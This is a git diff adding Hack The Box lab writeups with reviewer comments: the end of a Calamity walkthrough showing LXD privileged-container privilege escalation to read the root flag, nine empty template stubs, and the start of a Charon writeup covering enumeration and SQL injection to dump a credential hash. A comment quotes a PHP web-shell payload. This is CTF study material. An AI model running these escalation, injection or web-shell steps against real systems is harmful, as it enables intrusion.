+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ Downloading apk-tools-static-2.10.5-r1.apk
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ Downloading alpine-mirrors-3.5.10-r0.apk
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
+ Verified OK
+ Selecting mirror http://nl.alpinelinux.org/alpine/v3.12/main
+ fetch http://nl.alpinelinux.org/alpine/v3.12/main/x86/APKINDEX.tar.gz
+ (1/19) Installing musl (1.1.24-r9)
+ (2/19) Installing busybox (1.31.1-r19)
+ Executing busybox-1.31.1-r19.post-install
+ (3/19) Installing alpine-baselayout (3.2.0-r7)
+ Executing alpine-baselayout-3.2.0-r7.pre-install
+ Executing alpine-baselayout-3.2.0-r7.post-install
+ (4/19) Installing openrc (0.42.1-r10)
+ Executing openrc-0.42.1-r10.post-install
+ (5/19) Installing alpine-conf (3.9.0-r1)
+ (6/19) Installing libcrypto1.1 (1.1.1g-r0)
+ (7/19) Installing libssl1.1 (1.1.1g-r0)
+ (8/19) Installing ca-certificates-bundle (20191127-r4)
+ (9/19) Installing libtls-standalone (2.9.1-r1)
+ (10/19) Installing ssl_client (1.31.1-r19)
+ (11/19) Installing zlib (1.2.11-r3)
+ (12/19) Installing apk-tools (2.10.5-r1)
+ (13/19) Installing busybox-suid (1.31.1-r19)
+ (14/19) Installing busybox-initscripts (3.2-r2)
+ Executing busybox-initscripts-3.2-r2.post-install
+ (15/19) Installing scanelf (1.2.6-r0)
+ (16/19) Installing musl-utils (1.1.24-r9)
+ (17/19) Installing libc-utils (0.7.2-r3)
+ (18/19) Installing alpine-keys (2.2-r0)
+ (19/19) Installing alpine-base (3.12.0-r0)
+ Executing busybox-1.31.1-r19.trigger
+ OK: 8 MiB in 19 packages
+
+
+Let it build for a while, then once it's done building, we can use the scp command utility to move the tar.gz file onto the host machine, into xalvas' home directory.
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
+ → scp alpine-v3.12-i686-20200813_2019.tar.gz xalvas@10.10.10.27:
+ xalvas@10.10.10.27's password:
+ alpine-v3.12-i686-20200813_2019.tar.gz 100% 3135KB 535.0KB/s 00:05
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
+ → ssh xalvas@10.10.10.27
+ xalvas@10.10.10.27's password:
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic i686)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 9 packages can be updated.
+ 8 updates are security updates.
+
+
+ Last login: Thu Aug 13 12:40:34 2020 from 10.10.14.8
+ xalvas@calamity:~$ mkdir lxd
+ xalvas@calamity:~$ mv al
+ alarmclocks/ alpine-v3.12-i686-20200813_2019.tar.gz
+ xalvas@calamity:~$ mv alpine-v3.12-i686-20200813_2019.tar.gz lxd/
+ xalvas@calamity:~$ cd lxd/
+ xalvas@calamity:~/lxd$
+
+
+from here, all we need to do is run the alpine image and init the container:
+
+
+
+ xalvas@calamity:~/lxd$ lxc image import alpine-v3.12-i686-20200813_2019.tar.gz --alias nothing-alpine
+ Generating a client certificate. This may take a minute...
+ If this is your first time using LXD, you should also run: sudo lxd init
+ To start your first container, try: lxc launch ubuntu:16.04
+
+
+ Image imported with fingerprint: 705e08c329b2c8f7d803a5b7b943b828631ab50a5bf05cf8bd62cb4d48c150f9
+ xalvas@calamity:~/lxd$
+ xalvas@calamity:~/lxd$ lxc image list
+ +----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+ +----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
+ | nothing-alpine | 705e08c329b2 | no | alpine v3.12 (20200813_20:19) | i686 | 3.06MB | Aug 13, 2020 at 6:34pm (UTC) |
+ +----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
+ xalvas@calamity:~/lxd$ lxc init nothing-alpine privesc -c security.privileged=true
+ Creating privesc
+ xalvas@calamity:~/lxd$ lxc list
+ +---------+---------+------+------+------------+-----------+
+ | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+ +---------+---------+------+------+------------+-----------+
+ | privesc | STOPPED | | | PERSISTENT | 0 |
+ +---------+---------+------+------+------------+-----------+
+
+
+Here we basically init our alpine container with the security.privileged flag set to true. From here we need to add the privesc config to our host-root at /mnt/root and then start the privesc config from our container onto /bin/sh in order to get a root shell From the container, BUT the main host's root (/) directory is accessible from the container's /mnt/root, which means the root flag is accessible from /mnt/root/root/root.txt inside the container itself.
+
+
+
+ xalvas@calamity:~/lxd$ lxc config device add privesc host-root disk source=/ path=/mnt/root
+ Device host-root added to privesc
+ xalvas@calamity:~/lxd$ lxc start privesc
+ xalvas@calamity:~/lxd$ lxc exec privesc /bin/sh
+ ~ # id
+ uid=0(root) gid=0(root)
+ ~ # cat /mnt/root/root/root.txt
+ 9bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
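Review bot: the two PHP payloads and the command parameter in Part 2 are corrupted and will not work if copied. `<****?php echo "nihilist"; ?>` and `<****?php system($_REQUEST["cmd"]); ?>` carry markdown residue (`****`) where the payload should read `<?php ... ?>`, and every request uses `&cmd;=id` where the query string has to be `&cmd=id` (the `;` is an HTML-entity escaping artifact). In the same part, `/index.md (Status: 200)` in the gobuster output cannot be genuine: the run used `-x "txt,html,php,asp,aspx,jsp"` and no `.md`, so this is most likely `/index.html` rewritten by the HTML-to-markdown conversion; same for the sentence "It doesn't seem we can't get a reverse shell", whose double negative contradicts the phpinfo() result just shown. The audio step says "if we invert one of the 2 audio files" but only recov.wav is ever transferred; name the second file and say where it came from (the `mv al` tab completion shows an `alarmclocks/` directory that the writeup never opens), otherwise the reader cannot reproduce the step. On the decode, `base64 -di` works where `base64 -d` failed because `-i` ignores the non-alphabet characters left over from the HTML wrapping; say so rather than leaving the failed attempt unexplained. In Part 3, explain `./build-alpine -a i686`: the SSH banner shows the host is `i686`, so an x86_64 image would not start, and note that the `apt install docker.io` step is unused, the build output shows a static apk being fetched and the rootfs assembled directly. Finally, the sentence "add the privesc config to our host-root at /mnt/root and then start the privesc config from our container onto /bin/sh" muddles what happens: `lxc config device add privesc host-root disk source=/ path=/mnt/root` mounts the host's `/` as a disk device inside the container, and because `security.privileged=true` disables uid mapping, uid 0 in the container is uid 0 on the host, so everything under `/mnt/root` is readable and writable as real root, not only `root.txt`.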
diff --git a/Hard/20.md b/Hard/20.md
new file mode 100644
index 0000000..4dcc7ae
--- /dev/null
+++ b/Hard/20.md
@@ -0,0 +1,66 @@
+# Ellingson Writeup
+
+
+
+## Introduction :
+
+Ellingson is a hard linux box released back in May 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
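Review bot: Hard/20.md has no box-specific content beyond the introduction. The scans target the template address `10.10.10.1` and the placeholder ports `-p1,2`, Part 2 and Part 3 contain only "the text goes here" followed by blank padding, and the Conclusion ends at "Here we can see the progress graph :" with nothing following. If the file has to land now, replace the padding with a single work-in-progress line so the page does not read as a finished writeup, and drop the template scan commands until the real ones exist.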
diff --git a/Hard/21.md b/Hard/21.md
new file mode 100644
index 0000000..971e944
--- /dev/null
+++ b/Hard/21.md
@@ -0,0 +1,66 @@
+# Chainsaw Writeup
+
+
+
+## Introduction :
+
+Chainsaw is a hard linux box released back in June 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
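Review bot: Hard/21.md is the same empty template as the other 2019 boxes in this commit: placeholder nmap target and ports (`10.10.10.1`, `-p1,2`), "the text goes here" in Part 2 and Part 3 with fifteen empty lines each, and a Conclusion that references a progress graph that is absent. Consider committing these stubs without the fake scan commands, since a reader skimming Part 1 will take `sudo nmap -sCV -p1,2 10.10.10.1` for a real result.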
diff --git a/Hard/22.md b/Hard/22.md
new file mode 100644
index 0000000..ca37f16
--- /dev/null
+++ b/Hard/22.md
@@ -0,0 +1,66 @@
+# Player Writeup
+
+
+
+## Introduction :
+
+Player is a hard linux box released back in July 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
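Review bot: Hard/22.md is unfilled: only the introduction is box-specific, both nmap commands still use the template target `10.10.10.1` and port list `-p1,2`, Part 2 and Part 3 are "the text goes here" plus blank padding, and the Conclusion's progress graph is missing. Mark the page as work in progress or keep it out of this commit; an empty Part 2 under a finished-looking heading is misleading in the index.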
diff --git a/Hard/23.md b/Hard/23.md
new file mode 100644
index 0000000..f037036
--- /dev/null
+++ b/Hard/23.md
@@ -0,0 +1,66 @@
+# RE Writeup
+
+
+
+## Introduction :
+
+RE is a hard windows box released back in July 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
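Review bot: Hard/23.md is a template stub. The introduction is the only real sentence; the two nmap commands target `10.10.10.1` with placeholder ports, Part 2 and Part 3 read "the text goes here" over runs of empty lines, and the Conclusion has no graph. Also worth checking before filling it in: the Part 1 boilerplate ("-sU to for udp ports") and the `-sTU -p-` scan are copied from the Linux template, so confirm the same enumeration wording is what you want for a Windows box.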
diff --git a/Hard/24.md b/Hard/24.md
new file mode 100644
index 0000000..e0515aa
--- /dev/null
+++ b/Hard/24.md
@@ -0,0 +1,66 @@
+# Scavenger Writeup
+
+
+
+## Introduction :
+
+Scavenger is a hard linux box released back in August 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
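Review bot: Hard/24.md has no content past the introduction: template scan commands (`10.10.10.1`, `-p1,2`), "the text goes here" in Part 2 and Part 3 with blank padding, and a dangling "Here we can see the progress graph :". Either trim the padding to one work-in-progress line or hold the file back until the writeup exists.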
diff --git a/Hard/25.md b/Hard/25.md
new file mode 100644
index 0000000..ffc9130
--- /dev/null
+++ b/Hard/25.md
@@ -0,0 +1,66 @@
+# Zetta Writeup
+
+
+
+## Introduction :
+
+Zetta is a hard linux box released back in August 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
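Review bot: Hard/25.md is an empty template. Both nmap invocations still point at the placeholder `10.10.10.1` with `-p1,2`, Part 2 and Part 3 are "the text goes here" followed by fifteen blank lines each, and the Conclusion promises a graph that is not present. The stray "to" in "-sU to for udp ports" is inherited from the template as well.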
diff --git a/Hard/26.md b/Hard/26.md
new file mode 100644
index 0000000..4ac1c0c
--- /dev/null
+++ b/Hard/26.md
@@ -0,0 +1,66 @@
+# Registry Writeup
+
+
+
+## Introduction :
+
+Registry is a hard linux box released back in October 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
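Review bot: Hard/26.md is unfilled beyond its introduction: template target and ports in both nmap commands, placeholder "the text goes here" bodies in Part 2 and Part 3, and a Conclusion with no progress graph. If it must ship, add a visible work-in-progress marker under the title and remove the fake scan commands so they are not mistaken for results.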
diff --git a/Hard/27.md b/Hard/27.md
new file mode 100644
index 0000000..f504ac5
--- /dev/null
+++ b/Hard/27.md
@@ -0,0 +1,66 @@
+# Control Writeup
+
+
+
+## Introduction :
+
+Control is a hard windows box released back in November 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
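Review bot: Hard/27.md is a template stub with only the introduction filled in. The scans target `10.10.10.1` with `-p1,2`, Part 2 and Part 3 read "the text goes here" over blank padding, and "Here we can see the progress graph :" is followed by nothing. As with RE, the Part 1 wording and `-sTU -p-` scan come from the Linux template; check they are what you want for a Windows box before filling this in.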
diff --git a/Hard/28.md b/Hard/28.md
new file mode 100644
index 0000000..7ac627f
--- /dev/null
+++ b/Hard/28.md
@@ -0,0 +1,66 @@
+# Patents Writeup
+
+
+
+## Introduction :
+
+Patents is a hard linux box released back in January 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
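Review bot: Hard/28.md has no box-specific content after the introduction: placeholder nmap target `10.10.10.1` and ports `-p1,2`, "the text goes here" in Part 2 and Part 3 with fifteen empty lines each, and a Conclusion whose progress graph is missing. Trim the padding to a single work-in-progress line or leave the file out of this commit.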
diff --git a/Hard/29.md b/Hard/29.md
new file mode 100644
index 0000000..774439a
--- /dev/null
+++ b/Hard/29.md
@@ -0,0 +1,66 @@
+# Oouch Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
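Review bot: Hard/29.md is the most incomplete stub in this set: even the Introduction reads "the text goes here", so the page carries no statement of what Oouch is or when it was released, unlike the other stubs. Everything else is template: scans against `10.10.10.1` with `-p1,2`, placeholder Part 2 and Part 3 bodies over blank padding, and a Conclusion with no graph. At minimum fill in the introduction sentence before committing, or hold the file back.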
diff --git a/Hard/3.md b/Hard/3.md
new file mode 100644
index 0000000..b67053e
--- /dev/null
+++ b/Hard/3.md
@@ -0,0 +1,501 @@
+# Charon Writeup
+
+
+
+## Introduction :
+
+Charon is a hard linux box released back in july 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.31 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Discovered open port 22/tcp on 10.10.10.31
+ Discovered open port 80/tcp on 10.10.10.31
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
+ → nmap -sCV -p22,80 10.10.10.31
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 18:44 BST
+ Nmap scan report for 10.10.10.31
+ Host is up (0.027s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 09:c7:fb:a2:4b:53:1a:7a:f3:30:5e:b8:6e:ec:83:ee (RSA)
+ | 256 97:e0:ba:96:17:d4:a1:bb:32:24:f4:e5:15:b4:8a:ec (ECDSA)
+ |_ 256 e8:9e:0b:1c:e7:2d:b6:c9:68:46:7c:b3:32:ea:e9:ef (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Frozen Yogurt Shop
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 7.89 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+our nmap scan picked up port 80 so let's investigate it:
+
+
+
+
+ [ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
+ → nikto -h http://10.10.10.31/
+ - Nikto v2.1.6
+ ---------------------------------------------------------------------------
+ + Target IP: 10.10.10.31
+ + Target Hostname: 10.10.10.31
+ + Target Port: 80
+ + Start Time: 2020-08-08 18:46:07 (GMT1)
+ ---------------------------------------------------------------------------
+ + Server: Apache/2.4.18 (Ubuntu)
+ + The anti-clickjacking X-Frame-Options header is not present.
+ + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ + No CGI Directories found (use '-C all' to force check all possible dirs)
+ + IP address found in the 'location' header. The IP is "127.0.1.1".
+ + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ + Server may leak inodes via ETags, header found with file /, inode: 9f2, size: 552d7084393f2, mtime: gzip
+ + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ + OSVDB-3233: /icons/README: Apache default file found.
+ + 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ + End Time: 2020-08-08 18:51:23 (GMT1) (316 seconds)
+ ---------------------------------------------------------------------------
+ + 1 host(s) tested
+
+
+` charo
+
+Doesn't look like there's man things here for us to make use of, so let's use gobuster
+
+
+
+ [ 10.10.14.11/23 ] [ /dev/pts/11 ] [~]
+ → gobuster dir -u http://10.10.10.31/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x "txt,php,html,js,xml,pdf"
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.31/
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Extensions: php,html,js,xml,pdf,txt
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/08/08 18:50:04 Starting gobuster
+ ===============================================================
+ /about.html (Status: 200)
+ /index.md (Status: 200)
+ /product.html (Status: 200)
+ /contact.html (Status: 200)
+ /images (Status: 301)
+ /blog.html (Status: 200)
+ /css (Status: 301)
+ /js (Status: 301)
+ /include (Status: 301)
+ /fonts (Status: 301)
+ /cmsdata (Status: 301)
+ /server-status (Status: 403)
+ ===============================================================
+ 2020/08/08 19:09:12 Finished
+ ===============================================================
+
+
+
+the idea here was to run gobuster again into the /cmsdata directory in order to find the login.php webpage:
+
+
+
+ [ 10.10.14.11/23 ] [ /dev/pts/11 ] [~]
+ → gobuster dir -u http://10.10.10.31/cmsdata/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.
+ txt -t 50 -x "txt,php,html,js,xml,pdf"
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.31/cmsdata/
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Extensions: txt,php,html,js,xml,pdf
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/08/08 19:13:49 Starting gobuster
+ ===============================================================
+ /images (Status: 301)
+ /scripts (Status: 301)
+ /menu.php (Status: 302)
+ /login.php (Status: 200)
+ /upload.php (Status: 302)
+ /css (Status: 301)
+ /js (Status: 301)
+ /include (Status: 301)
+ /forgot.php (Status: 200)
+ Progress: 89237 / 220561 (40.46%)^C
+ [!] Keyboard interrupt detected, terminating.
+ ===============================================================
+ 2020/08/08 19:21:32 Finished
+ ===============================================================
+
+
+
+` 
+
+So here we on /cmsdata/login.php we stumble upon a SuperCMS login php page. There isn't much on the login page itself so we take a look at the "forgot password?" page and inspect the request with burpsuite:
+
+ 
+
+Here we get a generic error that email isn't found, But let's test out and see if we can trigger a SQL injection:
+
+
+
+Here we see something is up, let's poke at it further by using the "-- -" string to comment out the query , which should remove the error, and verify that we are dealing with a SQL injection:
+
+
+
+Now that we know it is a SQL injection, we can test it further:
+
+ 
+
+So now we know the 4th field takes in a string, which is an email,so let's poke around the sql injection further:
+
+
+
+and we found the supercms database! Now let's find the name of the table containing those emails
+
+
+
+So far we know we are in the supercms database, and looking at the table called "license", But with further enumeration we find another table called "operators":
+
+
+
+So now we have the name of the tables, we will enumerate the columns:
+
+  
+
+Now we know the table Operators contains the columns __username_ and __password_
+
+
+
+So now let's just dump the usernames and passwords:
+
+ 
+
+And we found credentials ! **super_cms_adm:0b0689ba94f94533400f4decd87fa260** however the password is hashed, so we use hash-identifier to figure out which format it is :
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
